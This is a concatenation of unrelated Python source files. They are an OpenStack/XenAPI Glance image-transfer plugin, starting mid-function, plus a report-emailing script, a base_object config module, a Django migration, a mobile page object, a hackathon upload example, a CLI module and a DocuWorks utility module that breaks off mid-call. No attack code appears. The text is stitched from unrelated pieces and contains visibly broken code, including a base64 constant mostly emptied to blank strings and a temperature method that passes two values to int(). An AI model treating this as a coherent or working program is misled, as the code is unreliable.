_download_tarball_by_url_v1(sr_path, staging_path, image_id, endpoint, extra_headers) def _download_tarball_by_url_v1( sr_path, staging_path, image_id, glance_endpoint, extra_headers): """Download the tarball image from Glance v1 and extract it into the staging area. Retry if there is any failure. """ url = "%(glance_endpoint)s/v1/images/%(image_id)s" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.info("Downloading %s with glance v1 api" % url) request = urllib2.Request(url, headers=extra_headers) try: _download_tarball_and_verify(request, staging_path) except Exception: logging.exception('Failed to retrieve %(url)s' % {'url': url}) raise def _download_tarball_by_url_v2( sr_path, staging_path, image_id, glance_endpoint, extra_headers): """Download the tarball image from Glance v2 and extract it into the staging area. Retry if there is any failure. 
""" url = "%(glance_endpoint)s/v2/images/%(image_id)s/file" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.debug("Downloading %s with glance v2 api" % url) request = urllib2.Request(url, headers=extra_headers) try: _download_tarball_and_verify(request, staging_path) except Exception: logging.exception('Failed to retrieve %(url)s' % {'url': url}) raise def _upload_tarball_v1(staging_path, image_id, glance_host, glance_port, glance_use_ssl, extra_headers, properties): if glance_use_ssl: scheme = 'https' else: scheme = 'http' url = '%s://%s:%s' % (scheme, glance_host, glance_port) _upload_tarball_by_url_v1(staging_path, image_id, url, extra_headers, properties) def _upload_tarball_by_url_v1(staging_path, image_id, glance_endpoint, extra_headers, properties): """Create a tarball of the image and then stream that into Glance v1 using chunked-transfer-encoded HTTP. """ # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) logging.debug("Uploading image %s with glance v1 api" % image_id) url = "%(glance_endpoint)s/v1/images/%(image_id)s" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} logging.info("Writing image data to %s" % url) # NOTE(sdague): this is python 2.4, which means urlparse returns a # tuple, not a named tuple. # 0 - scheme # 1 - host:port (aka netloc) # 2 - path parts = urlparse(url) try: conn = _create_connection(parts[0], parts[1]) except Exception, error: # noqa logging.exception('Failed to connect %(url)s' % {'url': url}) raise RetryableError(error) try: validate_image_status_before_upload_v1(conn, url, extra_headers) try: # NOTE(sirp): httplib under python2.4 won't accept # a file-like object to request conn.putrequest('PUT', parts[2]) # NOTE(sirp): There is some confusion around OVF. Here's a summary # of where we currently stand: # 1. OVF as a container format is misnamed. We really should be # using OVA since that is the name for the container format; # OVF is the standard applied to the manifest file contained # within. # 2. We're currently uploading a vanilla tarball. In order to be # OVF/OVA compliant, we'll need to embed a minimal OVF # manifest as the first file. # NOTE(dprince): In order to preserve existing Glance properties # we set X-Glance-Registry-Purge-Props on this request. 
headers = { 'content-type': 'application/octet-stream', 'transfer-encoding': 'chunked', 'x-image-meta-is-public': 'False', 'x-image-meta-status': 'queued', 'x-image-meta-disk-format': 'vhd', 'x-image-meta-container-format': 'ovf', 'x-glance-registry-purge-props': 'False'} headers.update(**extra_headers) for key, value in properties.items(): header_key = "x-image-meta-property-%s" % key.replace('_', '-') headers[header_key] = str(value) for header, value in headers.items(): conn.putheader(header, value) conn.endheaders() except Exception, error: # noqa logging.exception('Failed to upload %(url)s' % {'url': url}) raise RetryableError(error) callback_data = {'bytes_written': 0} def send_chunked_transfer_encoded(chunk): chunk_len = len(chunk) callback_data['bytes_written'] += chunk_len try: conn.send("%x\r\n%s\r\n" % (chunk_len, chunk)) except Exception, error: # noqa logging.exception('Failed to upload when sending chunks') raise RetryableError(error) compression_level = properties.get('xenapi_image_compression_level') utils.create_tarball( None, staging_path, callback=send_chunked_transfer_encoded, compression_level=compression_level) send_chunked_transfer_encoded('') # Chunked-Transfer terminator bytes_written = callback_data['bytes_written'] logging.info("Wrote %d bytes to %s" % (bytes_written, url)) resp = conn.getresponse() if resp.status == httplib.OK: return logging.error("Unexpected response while writing image data to %s: " "Response Status: %i, Response body: %s" % (url, resp.status, resp.read())) check_resp_status_and_retry(resp, image_id, url) finally: conn.close() def _update_image_meta_v2(conn, image_id, extra_headers, properties): # NOTE(sirp): There is some confusion around OVF. Here's a summary # of where we currently stand: # 1. OVF as a container format is misnamed. We really should be # using OVA since that is the name for the container format; # OVF is the standard applied to the manifest file contained # within. # 2. We're currently uploading a vanilla tarball. In order to be # OVF/OVA compliant, we'll need to embed a minimal OVF # manifest as the first file. body = [ {"path": "/container_format", "value": "ovf", "op": "add"}, {"path": "/disk_format", "value": "vhd", "op": "add"}, {"path": "/visibility", "value": "private", "op": "add"}] headers = {'Content-Type': 'application/openstack-images-v2.1-json-patch'} headers.update(**extra_headers) for key, value in properties.items(): prop = {"path": "/%s" % key.replace('_', '-'), "value": key, "op": "add"} body.append(prop) body = json.dumps(body) conn.request('PATCH', '/v2/images/%s' % image_id, body=body, headers=headers) resp = conn.getresponse() resp.read() if resp.status == httplib.OK: return logging.error("Image meta was not updated. Status: %s, Reason: %s" % ( resp.status, resp.reason)) def _upload_tarball_by_url_v2(staging_path, image_id, glance_endpoint, extra_headers, properties): """Create a tarball of the image and then stream that into Glance v2 using chunked-transfer-encoded HTTP. """ # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. 
socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) logging.debug("Uploading imaged %s with glance v2 api" % image_id) url = "%(glance_endpoint)s/v2/images/%(image_id)s/file" % { 'glance_endpoint': glance_endpoint, 'image_id': image_id} # NOTE(sdague): this is python 2.4, which means urlparse returns a # tuple, not a named tuple. # 0 - scheme # 1 - host:port (aka netloc) # 2 - path parts = urlparse(url) try: conn = _create_connection(parts[0], parts[1]) except Exception, error: # noqa raise RetryableError(error) try: _update_image_meta_v2(conn, image_id, extra_headers, properties) validate_image_status_before_upload_v2(conn, url, extra_headers) try: conn.connect() # NOTE(sirp): httplib under python2.4 won't accept # a file-like object to request conn.putrequest('PUT', parts[2]) headers = { 'content-type': 'application/octet-stream', 'transfer-encoding': 'chunked'} headers.update(**extra_headers) for header, value in headers.items(): conn.putheader(header, value) conn.endheaders() except Exception, error: # noqa logging.exception('Failed to upload %(url)s' % {'url': url}) raise RetryableError(error) callback_data = {'bytes_written': 0} def send_chunked_transfer_encoded(chunk): chunk_len = len(chunk) callback_data['bytes_written'] += chunk_len try: conn.send("%x\r\n%s\r\n" % (chunk_len, chunk)) except Exception, error: # noqa logging.exception('Failed to upload when sending chunks') raise RetryableError(error) compression_level = properties.get('xenapi_image_compression_level') utils.create_tarball( None, staging_path, callback=send_chunked_transfer_encoded, compression_level=compression_level) send_chunked_transfer_encoded('') # Chunked-Transfer terminator bytes_written = callback_data['bytes_written'] logging.info("Wrote %d bytes to %s" % (bytes_written, url)) resp = conn.getresponse() if resp.status == httplib.NO_CONTENT: return logging.error("Unexpected response while writing image data to %s: " "Response Status: %i, Response body: %s" % (url, resp.status, resp.read())) check_resp_status_and_retry(resp, image_id, url) finally: conn.close() def check_resp_status_and_retry(resp, image_id, url): # Note(Jesse): This branch sorts errors into those that are permanent, # those that are ephemeral, and those that are unexpected. if resp.status in (httplib.BAD_REQUEST, # 400 httplib.UNAUTHORIZED, # 401 httplib.PAYMENT_REQUIRED, # 402 httplib.FORBIDDEN, # 403 httplib.NOT_FOUND, # 404 httplib.METHOD_NOT_ALLOWED, # 405 httplib.NOT_ACCEPTABLE, # 406 httplib.PROXY_AUTHENTICATION_REQUIRED, # 407 httplib.CONFLICT, # 409 httplib.GONE, # 410 httplib.LENGTH_REQUIRED, # 411 httplib.PRECONDITION_FAILED, # 412 httplib.REQUEST_ENTITY_TOO_LARGE, # 413 httplib.REQUEST_URI_TOO_LONG, # 414 httplib.UNSUPPORTED_MEDIA_TYPE, # 415 httplib.REQUESTED_RANGE_NOT_SATISFIABLE, # 416 httplib.EXPECTATION_FAILED, # 417 httplib.UNPROCESSABLE_ENTITY, # 422 httplib.LOCKED, # 423 httplib.FAILED_DEPENDENCY, # 424 httplib.UPGRADE_REQUIRED, # 426 httplib.NOT_IMPLEMENTED, # 501 httplib.HTTP_VERSION_NOT_SUPPORTED, # 505 httplib.NOT_EXTENDED, # 510 ): raise PluginError("Got Permanent Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) # NOTE(nikhil): Only a sub-set of the 500 errors are retryable. We # optimistically retry on 500 errors below. 
elif resp.status in (httplib.REQUEST_TIMEOUT, # 408 httplib.INTERNAL_SERVER_ERROR, # 500 httplib.BAD_GATEWAY, # 502 httplib.SERVICE_UNAVAILABLE, # 503 httplib.GATEWAY_TIMEOUT, # 504 httplib.INSUFFICIENT_STORAGE, # 507 ): raise RetryableError("Got Ephemeral Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) else: # Note(Jesse): Assume unexpected errors are retryable. If you are # seeing this error message, the error should probably be added # to either the ephemeral or permanent error list. raise RetryableError("Got Unexpected Error response [%i] while " "uploading image [%s] to glance [%s]" % (resp.status, image_id, url)) def validate_image_status_before_upload_v1(conn, url, extra_headers): try: parts = urlparse(url) path = parts[2] image_id = path.split('/')[-1] # NOTE(nikhil): Attempt to determine if the Image has a status # of 'queued'. Because data will continued to be sent to Glance # until it has a chance to check the Image state, discover that # it is not 'active' and send back a 409. Hence, the data will be # unnecessarily buffered by Glance. This wastes time and bandwidth. # LP bug #1202785 conn.request('HEAD', path, headers=extra_headers) head_resp = conn.getresponse() # NOTE(nikhil): read the response to re-use the conn object. body_data = head_resp.read(8192) if len(body_data) > 8: err_msg = ('Cannot upload data for image %(image_id)s as the ' 'HEAD call had more than 8192 bytes of data in ' 'the response body.' % {'image_id': image_id}) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: head_resp.read() except Exception, error: # noqa logging.exception('Failed to HEAD the image %(image_id)s while ' 'checking image status before attempting to ' 'upload %(url)s' % {'image_id': image_id, 'url': url}) raise RetryableError(error) if head_resp.status != httplib.OK: logging.error("Unexpected response while doing a HEAD call " "to image %s , url = %s , Response Status: " "%i" % (image_id, url, head_resp.status)) check_resp_status_and_retry(head_resp, image_id, url) else: image_status = head_resp.getheader('x-image-meta-status') if image_status not in ('queued', ): err_msg = ('Cannot upload data for image %(image_id)s as the ' 'image status is %(image_status)s' % {'image_id': image_id, 'image_status': image_status}) logging.exception(err_msg) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: logging.info('Found image %(image_id)s in status ' '%(image_status)s. Attempting to ' 'upload.' % {'image_id': image_id, 'image_status': image_status}) def validate_image_status_before_upload_v2(conn, url, extra_headers): try: parts = urlparse(url) path = parts[2] image_id = path.split('/')[-2] # NOTE(nikhil): Attempt to determine if the Image has a status # of 'queued'. Because data will continued to be sent to Glance # until it has a chance to check the Image state, discover that # it is not 'active' and send back a 409. Hence, the data will be # unnecessarily buffered by Glance. This wastes time and bandwidth. 
# LP bug #1202785 conn.request('GET', '/v2/images/%s' % image_id, headers=extra_headers) get_resp = conn.getresponse() except Exception, error: # noqa logging.exception('Failed to GET the image %(image_id)s while ' 'checking image status before attempting to ' 'upload %(url)s' % {'image_id': image_id, 'url': url}) raise RetryableError(error) if get_resp.status != httplib.OK: logging.error("Unexpected response while doing a GET call " "to image %s , url = %s , Response Status: " "%i" % (image_id, url, get_resp.status)) check_resp_status_and_retry(get_resp, image_id, url) else: body = json.loads(get_resp.read()) image_status = body['status'] if image_status not in ('queued', ): err_msg = ('Cannot upload data for image %(image_id)s as the ' 'image status is %(image_status)s' % {'image_id': image_id, 'image_status': image_status}) logging.exception(err_msg) raise PluginError("Got Permanent Error while uploading image " "[%s] to glance [%s]. " "Message: %s" % (image_id, url, err_msg)) else: logging.info('Found image %(image_id)s in status ' '%(image_status)s. Attempting to ' 'upload.' % {'image_id': image_id, 'image_status': image_status}) get_resp.read() def download_vhd2(session, image_id, endpoint, uuid_stack, sr_path, extra_headers, api_version=1): """Download an image from Glance v2, unbundle it, and then deposit the VHDs into the storage repository. """ staging_path = utils.make_staging_area(sr_path) try: # Download tarball into staging area and extract it # TODO(mfedosin): remove this check when v1 is deprecated. if api_version == 1: _download_tarball_by_url_v1( sr_path, staging_path, image_id, endpoint, extra_headers) else: _download_tarball_by_url_v2( sr_path, staging_path, image_id, endpoint, extra_headers) # Move the VHDs from the staging area into the storage repository return utils.import_vhds(sr_path, staging_path, uuid_stack) finally: utils.cleanup_staging_area(staging_path) def upload_vhd2(session, vdi_uuids, image_id, endpoint, sr_path, extra_headers, properties, api_version=1): """Bundle the VHDs comprising an image and then stream them into Glance. """ staging_path = utils.make_staging_area(sr_path) try: utils.prepare_staging_area(sr_path, staging_path, vdi_uuids) # TODO(mfedosin): remove this check when v1 is deprecated. if api_version == 1: _upload_tarball_by_url_v1(staging_path, image_id, endpoint, extra_headers, properties) else: _upload_tarball_by_url_v2(staging_path, image_id, endpoint, extra_headers, properties) finally: utils.cleanup_staging_area(staging_path) if __name__ == '__main__': utils.register_plugin_calls(download_vhd2, upload_vhd2) miraculixx/pyrules10-100 class BaseStorage(object): def get_rule(self, name): raise NotImplementedError() def get_ruleset(self, name): raise NotImplementedError() reports_email.py #!/usr/bin/env python3 import os from datetime import date import reports import re import getpass import smtplib import emails # Inputs descriptions_dir = "/home/student/supplier-data/descriptions/" username = "student" pdf_path = "/tmp/processed.pdf" mail_server_ip = "localhost" # Get current date for pdf title date_string = date.today().strftime("%d-%m-%Y") date_line = "Processed update on {}".format(date_string) # Get description file paths file_list = os.listdir(descriptions_dir) txt_paths = [descriptions_dir + item for item in file_list if bool(re.search(r"txt", item))] # Generate pdf content paragraph_string = "" for txt_file in txt_paths: with open(txt_file) as in_file: content_list = in_file.readlines() paragraph_string += "name: {}
weight: {}

".format(content_list[0].replace("\n", ""), content_list[1].replace("\n", "")) if __name__ == "__main__": reports.generate_report(pdf_path, date_line, paragraph_string) email_msg = emails.generate_email( sender="", recipient=username + "@example.com", subject="Upload Completed - Online Fruit Store", body="All fruits are uploaded to our website successfully. A detailed list is attached to this email.", attachment=pdf_path) mail_server = smtplib.SMTP(mail_server_ip) emails.send_email( mail_serv=mail_server, email=email_msg) mail_server.quit() # -*- coding: utf-8 -*- """Functionality for configuring the the ``base_object`` package.""" # Includes functionality like get_config, set_config, and config_context # that is similar to scikit-learn. However,the code was altered to make # define the configuration as a class importable as a module similar to Tensorly # Modifications were also made to make things more easily extensible, by # driving the configuration settings based on a registry of configurations import os import sys import threading import types import warnings from contextlib import contextmanager from typing import Any, Dict, Iterator, List, Optional, Tuple try: from typing import Literal, TypedDict except ImportError: from typing_extensions import Literal, TypedDict # type: ignore __author__: List[str] = ["RNKuhns"] class ConfigParamSettingInfo(TypedDict): """Define types of the setting information for a given config parameter.""" env_name: str values: Tuple[Any, ...] default: Any _CONFIG_REGISTRY: Dict[str, ConfigParamSettingInfo] = { "print_changed_only": { "env_name": "BASE_OBJECT_PRINT_CHANGED_ONLY", "values": (True, False), "default": True, }, "display": { "env_name": "BASE_OBJECT_DISPLAY", "values": ("text", "diagram"), "default": "text", }, } _GLOBAL_CONFIG: Dict[str, Any] = { config_name: os.environ.get(config_info["env_name"], config_info["default"]) for config_name, config_info in _CONFIG_REGISTRY.items() } _THREAD_LOCAL_DATA = threading.local() class ConfigManager(types.ModuleType): """Configure the package.""" _default_config = _GLOBAL_CONFIG.copy() _threadlocal = _THREAD_LOCAL_DATA @classmethod def _get_threadlocal_config(cls) -> Dict[str, Any]: """Get a threadlocal **mutable** configuration. If the configuration does not exist, copy the default global configuration. Returns ------- threadlocal_global_config : dict Threadlocal global config or copy of default global configuration. """ if not hasattr(cls._threadlocal, "global_config"): cls._threadlocal.global_config = cls._default_config.copy() threadlocal_global_config = cls._threadlocal.global_config return threadlocal_global_config @classmethod def get_config_os_env_names(cls) -> List[str]: """Retrieve the os environment names for configurable settings. Returns ------- env_names : list The os environment names that can be used to set configurable settings. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config_os_env_names >>> get_config_os_env_names() ['BASE_OBJECT_PRINT_CHANGED_ONLY', 'BASE_OBJECT_DISPLAY'] """ return [config_info["env_name"] for config_info in _CONFIG_REGISTRY.values()] @classmethod def get_default_config(cls) -> Dict[str, Any]: """Retrive the default global configuration. 
Returns ------- config : dict The default configurable settings (keys) and their default values (values). See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_default_config >>> get_default_config() {'print_changed_only': True, 'display': 'text'} """ return _GLOBAL_CONFIG.copy() @classmethod def get_config(cls) -> Dict[str, Any]: """Retrieve current values for configuration set by :meth:`set_config`. Returns ------- config : dict The configurable settings (keys) and their default values (values). See Also -------- config_context : Configuration context manager. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config >>> get_config() {'print_changed_only': True, 'display': 'text'} """ return cls._get_threadlocal_config().copy() @classmethod def set_config( cls, print_changed_only: Optional[bool] = None, display: Literal["text", "diagram"] = None, local_threadsafe: bool = False, ) -> None: """Set global configuration. Parameters ---------- print_changed_only : bool, default=None If True, only the parameters that were set to non-default values will be printed when printing a BaseObject instance. For example, ``print(SVC())`` while True will only print 'SVC()', but would print 'SVC(C=1.0, cache_size=200, ...)' with all the non-changed parameters when False. If None, the existing value won't change. display : {'text', 'diagram'}, default=None If 'diagram', instances inheritting from BaseOBject will be displayed as a diagram in a Jupyter lab or notebook context. If 'text', instances inheritting from BaseObject will be displayed as text. If None, the existing value won't change. local_threadsafe : bool, default=False If False, set the backend as default for all threads. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_default_config : Reset configuration to default. Examples -------- >>> from base_object.config import get_config, set_config >>> get_config() {'print_changed_only': True, 'display': 'text'} >>> set_config(display='diagram') >>> get_config() {'print_changed_only': True, 'display': 'diagram'} """ local_config = cls._get_threadlocal_config() if print_changed_only is not None: local_config["print_changed_only"] = print_changed_only if display is not None: local_config["display"] = display if not local_threadsafe: cls._default_config = local_config @classmethod def set_default_config(cls) -> None: """Reset the configuration to the default. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current global configuration values. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. 
get_default_config : Return default global configuration values. set_config : Set global configuration. Examples -------- >>> from base_object.config import get_config, get_default_config, \ set_config, set_default_config >>> get_default_config() {'print_changed_only': True, 'display': 'text'} >>> set_config(display='diagram') >>> get_config() {'print_changed_only': True, 'display': 'diagram'} >>> set_default_config() >>> get_config() {'print_changed_only': True, 'display': 'text'} """ default_config = cls.get_default_config() cls.set_config(**default_config) @classmethod @contextmanager def config_context( cls, print_changed_only: Optional[bool] = None, display: Literal["text", "diagram"] = None, local_threadsafe: bool = False, ) -> Iterator[None]: """Context manager for global configuration. Parameters ---------- print_changed_only : bool, default=None If True, only the parameters that were set to non-default values will be printed when printing a BaseObject instance. For example, ``print(SVC())`` while True will only print 'SVC()', but would print 'SVC(C=1.0, cache_size=200, ...)' with all the non-changed parameters when False. If None, the existing value won't change. display : {'text', 'diagram'}, default=None If 'diagram', instances inheritting from BaseOBject will be displayed as a diagram in a Jupyter lab or notebook context. If 'text', instances inheritting from BaseObject will be displayed as text. If None, the existing value won't change. local_threadsafe : bool, default=False If False, set the backend as default for all threads. Yields ------ None See Also -------- set_config : Set global configuration. get_config : Retrieve current values of the global configuration. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_default_config : Reset configuration to default. Notes ----- All settings, not just those presently modified, will be returned to their previous values when the context manager is exited. Examples -------- >>> from base_object.config import config_context >>> with config_context(display='diagram'): ... pass """ old_config = cls.get_config() cls.set_config( print_changed_only=print_changed_only, display=display, local_threadsafe=local_threadsafe, ) try: yield finally: cls.set_config(**old_config) @classmethod def initialize_config(cls) -> None: """Initialize the package configuration. The package configuration is initialized according to the following hierarchy: - Any configurations set in the os environment variables are retrieved - Configurable settings not set in os environment have their default values retrieved - Set config is used to initialize the configuration. Returns ------- None : None No output returned. See Also -------- config_context : Configuration context manager. get_config : Retrieve current values of the global configuration. get_config_os_env_names : Retrieve os environment names that can be used to set configuration. get_default_config : Return default global configuration values. set_config : Set global configuration. set_default_config : Reset configuration to default. 
""" config_setting: Any config_settings: Dict[str, Any] = {} for config_name in _CONFIG_REGISTRY: config_setting = os.environ.get( _CONFIG_REGISTRY[config_name]["env_name"], cls._default_config[config_name], ) if config_setting == "True": config_setting = True if config_setting == "False": config_setting = False if config_setting not in _CONFIG_REGISTRY[config_name]["values"]: msg = f"{_CONFIG_REGISTRY[config_name]['env_name']} should be one of " msg += ( f"{', '.join(map(repr, _CONFIG_REGISTRY[config_name]['values']))}." ) msg += "Using default value for this configuration as a result." warnings.warn(msg, UserWarning) config_setting = cls._default_config[config_name] config_settings[config_name] = config_setting cls._default_config = config_settings cls.set_config(**config_settings) def __dir__(self) -> List[str]: """Indicate items in the scope.""" return [ "config_context", "get_config", "get_config_os_env_names", "get_default_config", "set_config", "set_default_config", "ConfigManager", ] # Initialise the backend to the default one ConfigManager.initialize_config() sys.modules[__name__].__class__ = ConfigManager # -*- coding: utf-8 -*- # Generated by Django 1.9 on 2016-05-09 10:34 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('accounts', '0005_auto_20160509_0801'), ] operations = [ migrations.AddField( model_name='profile', name='current_team', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='accounts.Profile'), ), ] sample/mobile/src/pages/weather_page.py from common._webdriver_qa_api.mobile.mobile_element import MobileElement from common._webdriver_qa_api.mobile.mobile_page import MobilePage from selenium.webdriver.common.by import By class WeatherPage(MobilePage): def __init__(self): super().__init__(locator_type=By.ID, locator='weather', name="Main weather page") self.lbl_location = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/location") self.lbl_location_time = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/local_time") self.btn_menu = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/sidebarButton") self.btn_add_location = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/addLocationButton") self.lbl_current_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temperature") self.lbl_weather_description = MobileElement(By.ID, "weather_description") self.lbl_max_daily_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temp_high") self.lbl_min_daily_temperature = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/temp_low") self.img_refresh = MobileElement(By.ID, "com.yahoo.mobile.client.android.weather:id/fl_inner") def refresh_data(self): self.swipe_down() self.img_refresh.wait_element_absent(timeout=5) def get_location(self) -> str: return self.lbl_location.text def get_current_temperature(self) -> int: return int(self.lbl_current_temperature.text[:-1]) def get_high_temperature(self) -> int: return int(self.lbl_max_daily_temperature.text[:-1], self.lbl_min_daily_temperature.text[:-1]) def click_add_location(self): self.btn_add_location.click() def open_menu(self): self.btn_menu.click() from samples.Logic import TokenHandler from samples.Logic import ForceBridgeConnector import urllib3 urllib3.disable_warnings() user = "GitHub" password = "" urlToken = 
"https://forcebridgehackathon.force.eco:25443/ffauth/oauth2.0/accessToken?client_id=" + user + "&client_secret=" + password + "&grant_type=client_credentials&scope=read%20write" urlToBridgeAPI = "https://forcebridgehackathon.force.eco:24443/ffwebservices/api/v3/" documentID = "F318273D75604B9EA1E255AAF522A477" fileName = "Test.txt" print("Welcome to uploading a file example!\n") print("Determine token ...\n") tokenhandler = TokenHandler.TokenHandler tokeninit = tokenhandler(user, password, urlToken) token = tokeninit.GetAccessToken() accessToken = token['access_token'] print("Token: " + accessToken + "\n") print("Upload ....\n") files=[ ('file', ('Test.txt', open('Test.txt', 'rb'), 'text/plain')) ] Connector = ForceBridgeConnector.FORCEBridgeConnector BridgeConnector = Connector(urlToBridgeAPI, accessToken) header = BridgeConnector.Tokenheader(accessToken) upload = BridgeConnector.PutFileinDocument(documentID, fileName, header, files) print(upload, "\n") print("Editor {} uploads file {} into documentID {} with version {} ".format(upload['properties']['editor'], upload['properties']['name'], upload['properties']['id'], upload['properties']['version'])) kerenleibovich/mlappmlapp/mlapp_cli/environment.py import click, os from mlapp.mlapp_cli.common.cli_utilities import set_env, create_file, create_directory from mlapp.mlapp_cli.cli_help import cli_environment_help @click.group("environment") def commands(): """ ML App Environment Command """ pass @commands.command("init", help=cli_environment_help.get('init', 'init environment file')) @click.argument("name", required=True, default='.env') def init(name): try: if '.env' not in name: name += '.env' env_full_path = os.path.join(os.getcwd(), os.path.join('env', name)) if not os.path.exists(env_full_path): # creates the env directory if not exists. create_directory(directory_name='env', include_init=False) # creates env file create_file(name, path='env') # set the new env file set_env(name) else: click.secho("ERROR: '" + name + "' file already exits.", fg='red') except Exception as e: click.secho("ERROR: Oops, something went wrong.", fg='red') @commands.command("set", help=cli_environment_help.get('set', 'sets environment file')) @click.argument("name", required=True) def set(name): try: if '.env' not in name: name += '.env' # set the new env file set_env(name) except Exception as e: click.secho("ERROR: Oops, something went wrong.", fg='red') #!/usr/bin/env python3 # vim: set fileencoding=utf-8 fileformat=unix expandtab : """common.py -- common utility functions Copyright (C) 2010 <> All rights reserved. This software is subject to the provisions of the Zope Public License, Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE. 
""" import os import re import base64 import time import datetime from functools import reduce from winreg import QueryValueEx, OpenKey, HKEY_LOCAL_MACHINE from .xdwapi import * from .observer import * from .timezone import * __all__ = ( "PIL_ENABLED", "CP", "CODEPAGE", "DEFAULT_TZ", "EV_DOC_REMOVED", "EV_DOC_INSERTED", "EV_PAGE_REMOVED", "EV_PAGE_INSERTED", "EV_ANN_REMOVED", "EV_ANN_INSERTED", "EV_ATT_REMOVED", "EV_ATT_INSERTED", "PSEP", "ASEP", "BLANKPAGE", "mm2in", "in2mm", "mm2px", "px2mm", "environ", "get_viewer", "inner_attribute_name", "outer_attribute_name", "adjust_path", "cp", "uc", "derivative_path", "newpath", "joinf", "flagvalue", "typevalue", "makevalue", "scale", "unpack", "charset_to_codepage", "codepage_to_charset", "set_ansi_charset", "set_oem_charset", ) PIL_ENABLED = True try: import Image except ImportError: try: from PIL import Image except ImportError: PIL_ENABLED = False if PIL_ENABLED: __all__ += ("Image",) PSEP = "\f" # page separator ASEP = "\v" # annotation separator CODEPAGE = f"cp{CP}" DEFAULT_TZ = JST # Observer pattern event EV_DOC_REMOVED = 11 EV_DOC_INSERTED = 12 EV_PAGE_REMOVED = 21 EV_PAGE_INSERTED = 22 EV_ANN_REMOVED = 31 EV_ANN_INSERTED = 32 EV_ATT_REMOVED = 41 EV_ATT_INSERTED = 42 BLANKPAGE = base64.b64decode( b"" b"" b"" b"" b"" b"" b"" b"WWiZ3nLz9ybH" b"SMn6N7lbLBvcP4N9bdr5aEvDiYGW+yhq/UcRKie8S+m7Gh3pZ+I8k67z8DRa" b"LMYeMyMWl+/EwXEPJlM8/qFlHHM3+s4KfKy7nQYeP+2alrTqceBJzkvl/G8l" b"jtuuv8lVZ0thyuzH3c72Kyw/SsoLtq3Yc0fBxJT633I+qcpvYyFzrf8fZ59P" b"" b"" b"/" b"" b"" b"" b"+" b"" b"ApVCwoTBOFAUqiAUJgnCgKVRUKEwThQFKo0FjYJPG4gKVR8KEwThQFKpIFCY" b"JwoClUpChME4UBSqXBQmCcKApVMwoTBOFAUqnAWNBVEbBrPEqnoUJgnCgKVa" b"CChME4UBSrQ4UJgnCgKVaMChME4UBSrSIUJgnCgKVaWCxpQpjQZZwalWmwoT" b"BOFAUq1AFCYJwoClWpQoTBOFAUq1UFCYJwoClWrwoTBOFAUhG2ongq29s7iy" b"T0y00ndosCO02exytv0TF89Mbz7yPvs72a+gkHD2kd0tVAc6gVfNbZpvmW5W" b"/linqmfRtX+cwuu5h1+ryOlI9JRkpyUpIATEqCZMjgWZxG9Lr7F9LrRpS0+u" b"Iu15yzQVWGKYwqc/FqVIqdCNZ2GH78VOiq6O6Z6Kv4Ks7ukFTpKs9FTCp01V" b"KeAO5OV1pR017/sBaYtCOxaHgGUagAEAggEAgwIHJ4QCBI2FBFLFTQqGBBoA" b"AAA=") INCH = 25.4 mm2in = lambda v: v / INCH in2mm = lambda v: v * INCH mm2px = lambda v, dpi: v / INCH * dpi px2mm = lambda v, dpi: v / dpi * INCH def environ(name=None, x64=False): """DocuWorks environment information.""" incompats = {XDW_GI_INSTALLPATH: "InstallPath", XDW_GI_BINPATH: "InstallBinPath"} vendor = "FujiXerox" if XDW_VERSION < "9.1" else "FUJIFILM" def getvalue(name): n = XDW_ENVIRON.normalize(name) if not n: raise InfoNotFoundError(f"illegal name '{name}'") if n == XDW_GI_DWDESK_FILENAME_DIGITS: return ord(XDW_GetInformation(n)) if n == XDW_GI_OCRENABLER_STATE: try: return not XDW_GetInformation(n) except InvalidArgError: return False if x64 and n in incompats: return uc(QueryValueEx( 